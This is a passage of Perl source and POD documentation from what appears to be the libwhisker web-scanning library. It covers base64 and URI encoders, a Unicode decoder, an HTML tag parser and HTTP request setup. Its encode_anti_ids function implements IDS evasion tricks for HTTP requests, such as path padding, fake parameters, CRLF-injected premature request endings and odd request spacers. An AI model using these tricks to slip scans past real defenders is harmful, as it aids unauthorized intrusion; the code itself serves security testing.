version carries the following copyright:\n\n Copyright 1995-1999 Gisle Aas <gisle@aas.no>\n\nNOTE: the $eol parameter will be inserted every 76 characters.  This is\nused to format the data for output on a 80 character wide terminal.\n\n=cut\n\n    sub encode_base64 {\n        if ($MIMEBASE64_TRYLOADING) {\n            eval \"require MIME::Base64\";\n            $MIMEBASE64_TRYLOADING = 0;\n        }\n        goto &MIME::Base64::encode_base64 if ($MIME::Base64::VERSION);\n        my $res = \"\";\n        my $eol = $_[1];\n        $eol = \"\\n\" unless defined $eol;\n        pos( $_[0] ) = 0;\n        while ( $_[0] =~ /(.{1,45})/gs ) {\n            $res .= substr( pack( 'u', $1 ), 1 );\n            chop($res);\n        }\n        $res =~ tr|` -_|AA-Za-z0-9+/|;\n        my $padding = ( 3 - length( $_[0] ) % 3 ) % 3;\n        $res =~ s/.{$padding}$/'=' x $padding/e if $padding;\n        if ( length $eol ) {\n            $res =~ s/(.{1,76})/$1$eol/g;\n        }\n        $res;\n    }\n\n########################################################################\n\n=item B<decode_base64>\n\nParams: $data\n\nReturn: $b64_decoded_data\n\nA perl implementation of base64 decoding.  The perl code for this function\nwas actually taken from an older MIME::Base64 perl module, and bears the \nfollowing copyright:\n\nCopyright 1995-1999 Gisle Aas <gisle@aas.no>\n\n=cut\n\n    sub decode_base64 {\n        if ($MIMEBASE64_TRYLOADING) {\n            eval \"require MIME::Base64\";\n            $MIMEBASE64_TRYLOADING = 0;\n        }\n        goto &MIME::Base64::decode_base64 if ($MIME::Base64::VERSION);\n        my $str = shift;\n        my $res = \"\";\n        $str =~ tr|A-Za-z0-9+=/||cd;\n        $str =~ s/=+$//;                # remove padding\n        $str =~ tr|A-Za-z0-9+/| -_|;    # convert to uuencoded format\n        while ( $str =~ /(.{1,60})/gs ) {\n            my $len = chr( 32 + length($1) * 3 / 4 );    # compute length byte\n            $res .= unpack( \"u\", $len . $1 );            # uudecode\n        }\n        $res;\n    }\n\n########################################################################\n\n}    # end package variables\n\n########################################################################\n\n=item B<encode_uri_hex>\n\nParams: $data\n\nReturn: $result\n\nThis function encodes every character (except the / character) with normal \nURL hex encoding.\n\n=cut\n\nsub encode_uri_hex {    # normal hex encoding\n    my $str = shift;\n    $str =~ s/([^\\/])/sprintf(\"%%%02x\",ord($1))/ge;\n    return $str;\n}\n\n#########################################################################\n\n=item B<encode_uri_randomhex>\n\nParams: $data\n\nReturn: $result\n\nThis function randomly encodes characters (except the / character) with \nnormal URL hex encoding.\n\n=cut\n\nsub encode_uri_randomhex {    # random normal hex encoding\n    my @T = split( //, shift );\n    my $s;\n    foreach (@T) {\n        if (m#[;=:&@\\?]#) {\n            $s .= $_;\n            next;\n        }\n        if ( ( rand() * 2 ) % 2 == 1 ) { $s .= sprintf( \"%%%02x\", ord($_) ); }\n        else { $s .= $_; }\n    }\n    return $s;\n}\n\n#########################################################################\n\n=item B<encode_uri_randomcase>\n\nParams: $data\n\nReturn: $result\n\nThis function randomly changes the case of characters in the string.\n\n=cut\n\nsub encode_uri_randomcase {\n    my ( $x, $uri ) = ( '', shift );\n    return $uri if ( $uri !~ tr/a-zA-Z// );    # fast-path\n    my @T = split( //, $uri );\n    for ( $x = 0 ; $x < ( scalar @T ) ; $x++ ) {\n        if ( ( rand() * 2 ) % 2 == 1 ) {\n            $T[$x] =~ tr/A-Za-z/a-zA-Z/;\n        }\n    }\n    return join( '', @T );\n}\n\n#########################################################################\n\n=item B<encode_unicode>\n\nParams: $data\n\nReturn: $result\n\nThis function converts a normal string into Windows unicode format\n(non-overlong or anything fancy).\n\n=cut\n\nsub encode_unicode {\n    my ( $c, $r ) = ( '', '' );\n    foreach $c ( split( //, shift ) ) {\n        $r .= pack( \"v\", ord($c) );\n    }\n    return $r;\n}\n\n#########################################################################\n\n=item B<decode_unicode>\n\nParams: $unicode_string\n\nReturn: $decoded_string\n\nThis function attempts to decode a unicode (UTF-8) string by\nconverting it into a single-byte-character string.  Overlong \ncharacters are converted to their standard characters in place; \nnon-overlong (aka multi-byte) characters are substituted with the \n0xff; invalid encoding characters are left as-is.\n\nNote: this function is useful for dealing with the various unicode\nexploits/vulnerabilities found in web servers; it is *not* good for\ndoing actual UTF-8 parsing, since characters over a single byte are\nbasically dropped/replaced with a placeholder.\n\n=cut\n\nsub decode_unicode {\n    my $str = $_[0];\n    return $str if ( $str !~ tr/!-~//c );    # fastpath\n    my ( $lead, $count, $idx );\n    my $out = '';\n    my $len = length($str);\n    my ( $ptr, $no, $nu ) = ( 0, 0, 0 );\n\n    while ( $ptr < $len ) {\n        my $c = substr( $str, $ptr, 1 );\n        if ( ord($c) >= 0xc0 && ord($c) <= 0xfd ) {\n            $count = 0;\n            $c     = ord($c) << 1;\n            while ( ( $c & 0x80 ) == 0x80 ) {\n                $c <<= 1;\n                last if ( $count++ == 4 );\n            }\n            $c = ( $c & 0xff );\n            for ( $idx = 1 ; $idx < $count ; $idx++ ) {\n                my $o = ord( substr( $str, $ptr + $idx, 1 ) );\n                $no = 1 if ( $o != 0x80 );\n                $nu = 1 if ( $o < 0x80 || $o > 0xbf );\n            }\n            my $o = ord( substr( $str, $ptr + $idx, 1 ) );\n            $nu = 1 if ( $o < 0x80 || $o > 0xbf );\n            if ($nu) {\n                $out .= substr( $str, $ptr++, 1 );\n            }\n            else {\n                if ($no) {\n                    $out .= \"\\xff\";    # generic replacement char\n                }\n                else {\n                    my $prior =\n                      ord( substr( $str, $ptr + $count - 1, 1 ) ) << 6;\n                    $out .= pack( \"C\",\n                        (( ord( substr( $str, $ptr + $count, 1 ) ) & 0x7f ) +\n                          $prior ) & 255 );\n                }\n                $ptr += $count + 1;\n            }\n            $no = $nu = 0;\n        }\n        else {\n            $out .= $c;\n            $ptr++;\n        }\n    }\n    return $out;\n}\n\n########################################################################\n\n=item B<encode_anti_ids>\n\nParams: \\%request, $modes\n\nReturn: nothing\n\nencode_anti_ids computes the proper anti-ids encoding/tricks \nspecified by $modes, and sets up %hin in order to use those tricks.  \nValid modes are (the mode numbers are the same as those found in whisker \n1.4):\n\n=over 4\n\n=item 1 Encode some of the characters via normal URL encoding\n\n=item 2 Insert directory self-references (/./)\n\n=item 3 Premature URL ending (make it appear the request line is done)\n\n=item 4 Prepend a long random string in the form of \"/string/../URL\"\n\n=item 5 Add a fake URL parameter\n\n=item 6 Use a tab instead of a space as a request spacer\n\n=item 7 Change the case of the URL (works against Windows and Novell)\n\n=item 8 Change normal separators ('/') to Windows version ('\\')\n\n=item 9 Session splicing [NOTE: not currently available]\n\n=item A Use a carriage return (0x0d) as a request spacer\n\n=item B Use binary value 0x0b as a request spacer\n\n=back\n\nYou can set multiple modes by setting the string to contain all the modes\ndesired; i.e. $modes=\"146\" will use modes 1, 4, and 6.\n\n=cut\n\nsub encode_anti_ids {\n    my ( $rhin, $modes ) = ( shift, shift );\n    my ( @T, $x, $c, $s, $y );\n    my $ENCODED = 0;\n    my $W       = $$rhin{'whisker'};\n\n    return if ( !( defined $rhin && ref($rhin) ) );\n\n    # in case they didn't do it already\n    $$rhin{'whisker'}->{'uri_orig'} = $$rhin{'whisker'}->{'uri'};\n\n    # note: order is important!\n\n    # mode 9 - session splicing\n    #if($modes=~/9/){\n    #\t$$rhin{'whisker'}->{'ids_session_splice'}=1;\n    #}\n\n    # mode 4 - prepend long random string\n    if ( $modes =~ /4/ ) {\n        $s = '';\n        if ( $$W{'uri'} =~ m#^/# ) {\n            $y = &utils_randstr;\n            $s .= $y while ( length($s) < 512 );\n            $$W{'uri'} = \"/$s/..\" . $$W{'uri'};\n        }\n    }\n\n    # mode 7  - (windows) random case sensitivity\n    if ( $modes =~ /7/ ) {\n        $$W{'uri'} = encode_uri_randomcase( $$W{'uri'} );\n    }\n\n    # mode 2 - directory self-reference (/./)\n    if ( $modes =~ /2/ ) {\n        $$W{'uri'} =~ s#/#/./#g;\n    }\n\n    # mode 8 - windows directory separator (\\)\n    if ( $modes =~ /8/ ) {\n        $$W{'uri'} =~ s#/#\\\\#g;\n        $$W{'uri'} =~ s#^\\\\#/#;\n        $$W{'uri'} =~ s#^([a-zA-Z0-9_]+):\\\\#$1://#;\n        $$W{'uri'} =~ s#\\\\$#/#;\n    }\n\n    # mode 1 - random URI (non-UTF8) encoding\n    if ( $modes =~ /1/ ) {\n        if ( $ENCODED == 0 ) {\n            $$W{'uri'} = encode_uri_randomhex( $$W{'uri'} );\n            $ENCODED = 1;\n        }\n    }\n\n    # mode 5 - fake parameter\n    if ( $modes =~ /5/ ) {\n        ( $s, $y ) = ( &utils_randstr, &utils_randstr );\n        $$W{'uri'} = \"/$s.html%3F$y=/../$$W{'uri'}\";\n    }\n\n    # mode 3 - premature URL ending\n    if ( $modes =~ /3/ ) {\n        $s = &utils_randstr;\n        $$W{'uri'} = \"/%20HTTP/1.1%0d%0aAccept%3a%20$s/../..$$W{'uri'}\";\n    }\n\n    # mode 6 - TAB as request spacer\n    if ( $modes =~ /6/ ) {\n        $$W{'http_space1'} = \"\\t\";\n    }\n\n    # mode A - CR as request spacer\n    if ( $modes =~ /A/i ) {\n        $$W{'http_space1'} = $$W{'http_space2'} = \"\\x0d\";\n    }\n\n    # mode B - 0x0b as request spacer\n    if ( $modes =~ /B/i ) {\n        $$W{'http_space1'} = $$W{'http_space2'} = \"\\x0b\";\n    }\n\n}\n\n\n=item B<FORMS FUNCTIONS>\n\nThe goal is to parse the variable, human-readable HTML into concrete\nstructures usable by your program.  The forms functions does do a good job\nat making these structures, but I will admit: they are not exactly simple,\nand thus not a cinch to work with.  But then again, representing something\nas complex as a HTML form is not a simple thing either.  I think the\nresults are acceptable for what's trying to be done.  Anyways...\n\nForms are stored in perl hashes, with elements in the following format:\n\n $form{'element_name'}=@([ 'type', 'value', @params ])\n\nThus every element in the hash is an array of anonymous arrays.  The first\narray value contains the element type (which is 'select', 'textarea',\n'button', or an 'input' value of the form 'input-text', 'input-hidden',\n'input-radio', etc).\n\nThe second value is the value, if applicable (it could be undef if no\nvalue was specified).  Note that select elements will always have an undef\nvalue--the actual values are in the subsequent options elements.\n\nThe third value, if defined, is an anonymous array of additional tag\nparameters found in the element (like 'onchange=\"blah\"', 'size=\"20\"',\n'maxlength=\"40\"', 'selected', etc).\n\nThe array does contain one special element, which is stored in the hash\nunder a NULL character (\"\\0\") key.  This element is of the format:\n\n $form{\"\\0\"}=['name', 'method', 'action', @parameters];\n\nThe element is an anonymous array that contains strings of the form's\nname, method, and action (values can be undef), and a @parameters array\nsimilar to that found in normal elements (above).\n\nAccessing individual values stored in the form hash becomes a test of your\nperl referencing skills.  Hint: to access the 'value' of the third element\nnamed 'choices', you would need to do:\n\n $form{'choices'}->[2]->[1];\n\nThe '[2]' is the third element (normal array starts with 0), and the\nactual value is '[1]' (the type is '[0]', and the parameter array is\n'[2]').\n\n=cut\n\n################################################################\n\n# Cluster global variables\n# %_forms_ELEMENTS = (\n#     'form'     => 1,\n#     'input'    => 1,\n#     'textarea' => 1,\n#     'button'   => 1,\n#     'select'   => 1,\n#     'option'   => 1,\n#     '/select'  => 1\n# );\n\n################################################################\n\n=item B<forms_read>\n\nParams: \\$html_data\n\nReturn: \\@found_forms\n\nThis function parses the given $html_data into libwhisker form hashes.  \nIt returns a reference to an array of hash references to the found \nforms.\n\n=cut\n\n# sub forms_read {\n#     my $dr = shift;\n#     return undef if ( !ref($dr) || length($$dr) == 0 );\n\n#     my $A = [ {}, [] ];\n\n#     html_find_tags( $dr, \\&_forms_parse_callback, 0, $A, \\%_forms_ELEMENTS );\n\n#     if ( scalar %{ $A->[0] } ) {\n#         push( @{ $A->[1] }, $A->[0] );\n#     }\n\n#     return $A->[1];\n# }\n\n################################################################\n\n=item B<forms_write>\n\nParams: \\%form_hash\n\nReturn: $html_of_form [undef on error]\n\nThis function will take the given %form hash and compose a generic HTML\nrepresentation of it, formatted with tabs and newlines in order to make it\nneat and tidy for printing.\n\nNote: this function does *not* escape any special characters that were\nembedded in the element values.\n\n=cut\n\n# sub forms_write {\n#     my $hr = shift;\n#     return undef if ( !ref($hr) || !( scalar %$hr ) );\n#     return undef if ( !defined $$hr{\"\\0\"} );\n\n#     my $t = '<form name=\"' . $$hr{\"\\0\"}->[0] . '\" method=\"';\n#     $t .= $$hr{\"\\0\"}->[1] . '\" action=\"' . $$hr{\"\\0\"}->[2] . '\"';\n#     if ( defined $$hr{\"\\0\"}->[3] ) {\n#         $t .= ' ' . join( ' ', @{ $$hr{\"\\0\"}->[3] } );\n#     }\n#     $t .= \">\\n\";\n\n#     my ( $name, $ar );\n#     while ( ( $name, $ar ) = each(%$hr) ) {\n#         next if ( $name eq \"\\0\" );\n#         next if ( $name eq '' && $ar->[0]->[0] eq '' );\n#         foreach $a (@$ar) {\n#             my $P = '';\n#             $P = ' ' . join( ' ', @{ $$a[2] } ) if ( defined $$a[2] );\n#             $t .= \"\\t\";\n\n#             if ( $$a[0] eq 'textarea' ) {\n#                 $t .= \"<textarea name=\\\"$name\\\"$P>$$a[1]\";\n#                 $t .= \"</textarea>\\n\";\n\n#             }\n#             elsif ( $$a[0] =~ m/^input-(.+)$/ ) {\n#                 $t .= \"<input type=\\\"$1\\\" name=\\\"$name\\\" \";\n#                 $t .= \"value=\\\"$$a[1]\\\"$P>\\n\";\n\n#             }\n#             elsif ( $$a[0] eq 'option' ) {\n#                 $t .= \"\\t<option value=\\\"$$a[1]\\\"$P>$$a[1]\\n\";\n\n#             }\n#             elsif ( $$a[0] eq 'select' ) {\n#                 $t .= \"<select name=\\\"$name\\\"$P>\\n\";\n\n#             }\n#             elsif ( $$a[0] eq '/select' ) {\n#                 $t .= \"</select$P>\\n\";\n\n#             }\n#             else {    # button\n#                 $t .= \"<button name=\\\"$name\\\" value=\\\"$$a[1]\\\">\\n\";\n#             }\n#         }\n#     }\n\n#     $t .= \"</form>\\n\";\n#     return $t;\n# }\n\n################################################################\n\n# {    # these are 'private' static variables for &_forms_parse_html\n#     my $CURRENT_SELECT = undef;\n#     my $UNKNOWNS       = 0;\n\n#     sub _forms_parse_callback {\n#         my ( $TAG, $hr, $dr, $start, $len, $ar ) = ( lc(shift), @_ );\n#         my ( $saveparam, $parr, $key ) = ( 0, undef, '' );\n\n#         my $_forms_CURRENT = $ar->[0];\n#         my $_forms_FOUND   = $ar->[1];\n\n#         if ( scalar %$hr ) {\n#             while ( my ( $key, $val ) = each %$hr ) {\n#                 if ( $key =~ tr/A-Z// ) {\n#                     delete $$hr{$key};\n#                     if ( defined $val ) { $$hr{ lc($key) } = $val; }\n#                     else { $$hr{ lc($key) } = undef; }\n#                 }\n#             }\n#         }\n\n#         if ( $TAG eq 'form' ) {\n#             if ( scalar %$_forms_CURRENT ) {    # save last form\n#                 push( @$_forms_FOUND, $_forms_CURRENT );\n#                 $ar->[0] = {};\n#                 $_forms_CURRENT = $ar->[0];\n#             }\n\n#             $_forms_CURRENT->{\"\\0\"} =\n#               [ $$hr{name}, $$hr{method}, $$hr{action}, [] ];\n#             delete $$hr{'name'};\n#             delete $$hr{'method'};\n#             delete $$hr{'action'};\n#             $key      = \"\\0\";\n#             $UNKNOWNS = 0;\n\n#         }\n#         elsif ( $TAG eq 'input' ) {\n#             $$hr{type}  = 'text'                  if ( !defined $$hr{type} );\n#             $$hr{name}  = 'unknown' . $UNKNOWNS++ if ( !defined $$hr{name} );\n#             $$hr{value} = undef                   if ( !defined $$hr{value} );\n#             $key        = $$hr{name};\n\n#             push @{ $_forms_CURRENT->{$key} },\n#               [ 'input-' . $$hr{type}, $$hr{value}, [] ];\n#             delete $$hr{'name'};\n#             delete $$hr{'type'};\n#             delete $$hr{'value'};\n\n#         }\n#         elsif ( $TAG eq 'select' ) {\n#             $$hr{name} = 'unknown' . $UNKNOWNS++ if ( !defined $$hr{name} );\n#             $key = $$hr{name};\n#             push @{ $_forms_CURRENT->{$key} }, [ 'select', undef, [] ];\n#             $CURRENT_SELECT = $key;\n#             delete $$hr{name};\n\n#         }\n#         elsif ( $TAG eq '/select' ) {\n#             push @{ $_forms_CURRENT->{$CURRENT_SELECT} },\n#               [ '/select', undef, [] ];\n#             $CURRENT_SELECT = undef;\n#             return undef;\n\n#         }\n#         elsif ( $TAG eq 'option' ) {\n#             return undef if ( !defined $CURRENT_SELECT );\n#             if ( !defined $$hr{value} ) {\n#                 my $stop = index( $$dr, '<', $start + $len );\n#                 return undef if ( $stop == -1 );    # MAJOR PUKE\n#                 $$hr{value} =\n#                   substr( $$dr, $start + $len, ( $stop - $start - $len ) );\n#                 $$hr{value} =~ tr/\\r\\n//d;\n#             }\n#             push @{ $_forms_CURRENT->{$CURRENT_SELECT} },\n#               [ 'option', $$hr{value}, [] ];\n#             delete $$hr{value};\n\n#         }\n#         elsif ( $TAG eq 'textarea' ) {\n#             my $stop = $start + $len;\n#             $$hr{value} = $$hr{'='};\n#             delete $$hr{'='};\n#             $$hr{name} = 'unknown' . $UNKNOWNS++ if ( !defined $$hr{name} );\n#             $key = $$hr{name};\n#             push @{ $_forms_CURRENT->{$key} }, [ 'textarea', $$hr{value}, [] ];\n#             delete $$hr{'name'};\n#             delete $$hr{'value'};\n\n#         }\n#         else {    # button\n#             $$hr{name}  = 'unknown' . $UNKNOWNS++ if ( !defined $$hr{name} );\n#             $$hr{value} = undef                   if ( !defined $$hr{value} );\n#             $key        = $$hr{name};\n#             push @{ $_forms_CURRENT->{$key} }, [ 'button', $$hr{value}, [] ];\n#             delete $$hr{'name'};\n#             delete $$hr{'value'};\n#         }\n\n#         if ( scalar %$hr ) {\n#             if ( $TAG eq 'form' ) { $parr = $_forms_CURRENT->{$key}->[3]; }\n#             else {\n#                 $parr = $_forms_CURRENT->{$key}->[-1];\n#                 $parr = $parr->[2];\n#             }\n\n#             my ( $k, $v );\n#             while ( ( $k, $v ) = each(%$hr) ) {\n#                 if ( defined $v ) { push @$parr, \"$k=\\\"$v\\\"\"; }\n#                 else { push @$parr, $k; }\n#             }\n#         }\n\n#         return undef;\n#     }\n# }\n\n\n################################################################\n\n=item B<html_find_tags>\n\nParams: \\$data, \\&callback_function [, $xml_flag, $funcref, \\%tag_map]\n\nReturn: nothing\n\nhtml_find_tags parses a piece of HTML and 'extracts' all found tags,\npassing the info to the given callback function.  The callback function \nmust accept two parameters: the current tag (as a scalar), and a hash ref \nof all the tag's elements. For example, the tag <a href=\"/file\"> will\npass 'a' as the current tag, and a hash reference which contains\n{'href'=>\"/file\"}.\n\nThe xml_flag, when set, causes the parser to do some extra processing\nand checks to accommodate XML style tags such as <tag foo=\"bar\"/>.\n\nThe optional %tagmap is a hash of lowercase tag names.  If a tagmap is\nsupplied, then the parser will only call the callback function if the\ntag name exists in the tagmap.\n\nThe optional $funcref variable is passed straight to the callback\nfunction, allowing you to pass flags or references to more complex\nstructures to your callback function.\n\n=cut\n\n{    # contained variables\n    $DR  = undef;    # data reference\n    $c   = 0;        # parser pointer\n    $LEN = 0;\n\n    sub html_find_tags {\n        my ( $dataref, $callbackfunc, $xml, $fref, $tagmap ) = @_;\n\n        return if ( !( defined $dataref      && ref($dataref) ) );\n        return if ( !( defined $callbackfunc && ref($callbackfunc) ) );\n        $xml ||= 0;\n\n        my ( $INTAG, $CURTAG, $LCCURTAG, $ELEMENT, $VALUE, $cc ) = (0);\n        my ( %TAG, $ret, $start, $tagstart, $tempstart, $x, $found );\n        my $usetagmap = ( ( defined $tagmap && ref($tagmap) ) ? 1 : 0 );\n        $CURTAG = $LCCURTAG = $ELEMENT = $VALUE = $cc = '';\n        $DR     = $dataref;\n\n        $LEN = length($$dataref);\n        for ( $c = 0 ; $c < $LEN ; $c++ ) {\n\n            $cc = substr( $$dataref, $c, 1 );\n            next if ( !$INTAG && $cc ne '>' && $cc ne '<' );\n\n            if ( $cc eq '<' ) {\n                if ($INTAG) {\n\n                    # we're already in a tag...\n                    # we trick the parser into thinking we end cur tag\n                    $cc = '>';\n                    $c--;\n\n                }\n                elsif ($xml\n                    && $LEN > ( $c + 9 )\n                    && substr( $$dataref, $c + 1, 8 ) eq '![CDATA[' )\n                {\n                    $c += 9;\n                    $tempstart = $c;\n                    $found     = index( $$dataref, ']]>', $c );\n                    $c         = $found + 2;\n                    $c         = $LEN if ( $found < 0 );         # malformed XML\n                         # what to do with CDATA?\n                    next;\n\n                }\n                elsif ( $LEN > ( $c + 3 )\n                    && substr( $$dataref, $c + 1, 3 ) eq '!--' )\n                {\n                    $tempstart = $c;\n                    $c += 4;\n                    $found = index( $$dataref, '-->', $c );\n                    if ( $found < 0 ) {\n                        $found = index( $$dataref, '>', $c );\n                        $found = $LEN if ( $found < 0 );\n                        $c = $found;\n                    }\n                    else {\n                        $c = $found + 2;\n                    }\n                    if ( $usetagmap == 0 || defined $tagmap->{'!--'} ) {\n                        my $dat = substr(\n                            $$dataref,\n                            $tempstart + 4,\n                            $found - $tempstart - 4\n                        );\n                        &$callbackfunc( '!--', { '=' => $dat },\n                            $dataref, $tempstart, $c - $tempstart + 1, $fref );\n                    }\n                    next;\n\n                }\n                elsif ( !$INTAG ) {\n                    next if ( substr( $$dataref, $c + 1, 1 ) =~ tr/ \\t\\r\\n// );\n                    $c++;\n                    $INTAG    = 1;\n                    $tagstart = $c - 1;\n\n                    $CURTAG = '';\n                    while ( $c < $LEN\n                        && ( $x = substr( $$dataref, $c, 1 ) ) !~\n                        tr/ \\t\\r\\n>=// )\n                    {\n                        $CURTAG .= $x;\n                        $c++;\n                    }\n\n                    chop $CURTAG if ( $xml && substr( $CURTAG, -1, 1 ) eq '/' );\n                    $c++ if ( defined $x && $x ne '>' );\n\n                    $LCCURTAG = lc($CURTAG);\n                    $INTAG = 0 if ( $LCCURTAG !~ tr/a-z0-9// );\n                    next if ( $c >= $LEN );\n                    $cc = substr( $$dataref, $c, 1 );\n                }\n            }\n\n            if ( $cc eq '>' ) {\n                next if ( !$INTAG );\n                if ( $LCCURTAG eq 'script' && !$xml ) {\n                    $tempstart = $c + 1;\n                    pos($$dataref) = $c;\n                    if ( $$dataref !~ m#(</script.*?>)#ig ) {\n\n                        # what to do if closing script not found?\n                        # right now, we'll just leave the tag alone;\n                        # this won't affect the 'absorption' of the\n                        # javascript code (and thus, affect parsing)\n                    }\n                    else {\n                        $c = pos($$dataref) - 1;\n                        my $l = length($1);\n                        $TAG{'='} =\n                          substr( $$dataref, $tempstart,\n                            $c - $tempstart - $l + 1 );\n                    }\n\n                }\n                elsif ( $LCCURTAG eq 'textarea' && !$xml ) {\n                    $tempstart = $c + 1;\n                    pos($$dataref) = $c;\n                    if ( $$dataref !~ m#(</textarea.*?>)#ig ) {\n\n                        # no closing textarea...\n                    }\n                    else {\n                        $c = pos($$dataref) - 1;\n                        my $l = length($1);\n                        $TAG{'='} =\n                          substr( $$dataref, $tempstart,\n                            $c - $tempstart - $l + 1 );\n                    }\n                }\n\n                $INTAG = 0;\n                $TAG{'/'}++\n                  if ( $xml && substr( $$dataref, $c - 1, 1 ) eq '/' );\n                &$callbackfunc( $CURTAG, \\%TAG, $dataref, $tagstart,\n                    $c - $tagstart + 1, $fref )\n                  if ( $usetagmap == 0 || defined $tagmap->{$LCCURTAG} );\n                $CURTAG = $LCCURTAG = '';\n                %TAG = ();\n                next;\n            }\n\n            if ($INTAG) {\n                $ELEMENT = '';\n                $VALUE   = undef;\n\n                # eat whitespace\n                pos($$dataref) = $c;\n                if ( $$dataref !~ m/[^ \\t\\r\\n]/g ) {\n                    $c = $LEN;\n                    next;    # should we really abort?\n                }\n                $start = pos($$dataref) - 1;\n\n                if ( $$dataref !~ m/[ \\t\\r\\n<>=]/g ) {\n                    $c = $LEN;\n                    next;    # should we really abort?\n                }\n                $c = pos($$dataref) - 1;\n\n                if ( $c > $start ) {\n                    $ELEMENT = substr( $$dataref, $start, $c - $start );\n                    chop $ELEMENT\n                      if ( $xml && substr( $ELEMENT, -1, 1 ) eq '/' );\n                }\n\n                $cc = substr( $$dataref, $c, 1 );\n                if ( $cc ne '>' ) {\n\n                    # eat whitespace\n                    if ( $cc =~ tr/ \\t\\r\\n// ) {\n                        $c++\n                          while ( substr( $$dataref, $c, 1 ) =~ tr/ \\t\\r\\n// );\n                    }\n\n                    if ( substr( $$dataref, $c, 1 ) eq '=' ) {\n                        $c++;\n                        $start = $c;\n                        my $p = substr( $$dataref, $c, 1 );\n                        if ( $p eq '\"' || $p eq '\\'' ) {\n                            $c++;\n                            $start++;\n                            $c = index( $$dataref, $p, $c );\n                            if ( $c < 0 ) { $c = $LEN; next; }    # Bad HTML\n                            $VALUE = substr( $$dataref, $start, $c - $start );\n                            $c++;\n                            pos($$dataref) = $c;\n                        }\n                        else {\n                            pos($$dataref) = $c;\n                            if ( $$dataref !~ /[ \\t\\r\\n>]/g ) {\n                                $c = $LEN;\n                            }\n                            else {\n                                $c     = pos($$dataref) - 1;\n                                $VALUE =\n                                  substr( $$dataref, $start, $c - $start );\n                                chop $VALUE\n                                  if ( $xml\n                                    && substr( $$dataref, $c - 1, 2 ) eq '/>' );\n                            }\n                        }\n\n                        if ( substr( $$dataref, $c, 1 ) =~ tr/ \\t\\r\\n// ) {\n                            if ( $$dataref !~ /[^ \\t\\r\\n]/g ) {\n                                $c = $LEN;\n                                next;    # should we really abort?\n                            }\n                            $c = pos($$dataref) - 1;\n                        }\n                    }\n                }    # if $c ne '>'\n                $c--;\n                $TAG{$ELEMENT} = $VALUE\n                  if ( $ELEMENT ne '' || ( $xml && $ELEMENT ne '/' ) );\n            }\n        }\n\n        # finish off any tags we had going\n        if ($INTAG) {\n            &$callbackfunc( $CURTAG, \\%TAG, $dataref, $tagstart,\n                $c - $tagstart + 1, $fref )\n              if ( $usetagmap == 0 || defined $tagmap->{$LCCURTAG} );\n        }\n\n        $DR = undef;    # void dataref pointer\n    }\n\n################################################################\n\n=item B<html_find_tags_rewrite>\n\nParams: $position, $length, $replacement\n\nReturn: nothing\n\nhtml_find_tags_rewrite() is used to 'rewrite' an HTML stream from\nwithin an html_find_tags() callback function.  In general, you can\nthink of html_find_tags_rewrite working as:\n\nsubstr(DATA, $position, $length) = $replacement\n\nWhere DATA is the current HTML string the html parser is using.\nThe reason you need to use this function and not substr() is\nbecause a few internal parser pointers and counters need to be\nadjusted to accommodate the changes.\n\nIf you want to remove a piece of the string, just set the\nreplacement to an empty string ('').  If you wish to insert a\nstring instead of overwrite, just set $length to 0; your string\nwill be inserted at the indicated $position.\n\n=cut\n\n    sub html_find_tags_rewrite {\n        return if ( !defined $DR );\n        my ( $pos, $len, $replace_str ) = @_;\n\n        # replace the data\n        substr( $$DR, $pos, $len ) = $replace_str;\n\n        # adjust pointer and length\n        my $l = ( length($replace_str) - $len );\n        $c   += $l;\n        $LEN += $l;\n    }\n\n###############################################################\n\n    sub _html_find_tags_adjust {\n        my ( $p, $l ) = @_;\n        $c   += $p;\n        $LEN += $l;\n    }\n}    # end container\n\n################################################################\n\n=item B<html_link_extractor>\n\nParams: \\$html_data\n\nReturn: @urls\n\nThe html_link_extractor() function uses the internal crawl tests to\nextract all the HTML links from the given HTML data stream.\n\nNote: html_link_extractor() does not unique the returned array of\ndiscovered links, nor does it attempt to remove javascript links\nor make the links absolute.  It just extracts every raw link from\nthe HTML stream and returns it.  You'll have to do your own\npost-processing.\n\n=cut\n\nsub html_link_extractor {\n    my $data = shift;\n    my $ptr;\n    if ( ref($data) ) {\n        $ptr = $data;\n    }\n    else {\n        $ptr = \\$data;\n    }\n\n    # emulate the crawl object parts we need\n    my %OBJ = ( urls => [], forms => {} );\n    $OBJ{response}                   = {};\n    $OBJ{response}->{whisker}        = {};\n    $OBJ{response}->{whisker}->{uri} = '';\n\n    html_find_tags(\n        $ptr,                           # data\n        \\&_crawl_extract_links_test,    # callback function\n        0,                              # xml mode\n        \\%OBJ,                          # data object\n        \\%_crawl_linktags\n    );                 \n\n    return @{ $OBJ{urls} };\n}\n\n################################################################\n\n\n##################################################################\n\n# cluster global variables\n%http_host_cache = ();\n\n##################################################################\n\n=item B<http_new_request>\n\nParams: %parameters\n\nReturn: \\%request_hash\n\nThis function basically 'objectifies' the creation of whisker\nrequest hash objects.  You would call it like:\n\n $req = http_new_request( host=>'www.example.com', uri=>'/' )\n\nwhere 'host' and 'uri' can be any number of {whisker} hash\ncontrol values (see http_init_request for default list).\n\n=cut\n\nsub http_new_request {\n    my %X = @_;\n    my ( $k, $v, %RET, %RES );\n\n    http_init_request( \\%RET );\n    while ( ( $k, $v ) = each(%X) ) {\n        $RET{whisker}->{$k} = $v;\n    }\n    $RES{whisker}          = {};\n    $RES{whisker}->{MAGIC} = 31340;\n    $RES{whisker}->{uri}   = '';\n    return ( \\%RET, \\%RES ) if wantarray();\n    return \\%RET;\n}\n\n##################################################################\n\n=item B<http_new_response>\n\nParams: [none]\n\nReturn: \\%response_hash\n\nThis function basically 'objectifies' the creation of whisker\nresponse hash objects.  You would call it like:\n\n\t$resp = http_new_response()\n\n=cut\n\nsub http_new_response {\n    my %RET;\n    $RET{whisker}          = {};\n    $RET{whisker}->{MAGIC} = 31340;\n    $RET{whisker}->{uri}   = '';\n    return \\%RET;\n}\n\n##################################################################\n\n=item B<http_init_request>\n\nParams: \\%request_hash_to_initialize\n\nReturn: Nothing (modifies input hash)\n\nSets default values to the input hash for use.  Sets the host to\n'localhost', port 80, request URI '/', using HTTP 1.1 with GET\nmethod.  The timeout is set to 10 seconds, no proxies are defined, and all\nURI formatting is set to standard HTTP syntax.  It also sets the\nConnection (Keep-Alive) and User-Agent headers.\n\nNOTICE!!  It's important to use http_init_request before calling \nhttp_do_request, or http_do_request might puke.  Thus, a special magic \nvalue is placed in the hash to let http_do_request know that the hash has \nbeen properly initialized.  If you really must 'roll your own' and not use \nhttp_init_request before you call http_do_request, you will at least need \nto set the MAGIC value (amongst other things).\n\n=cut\n\nsub 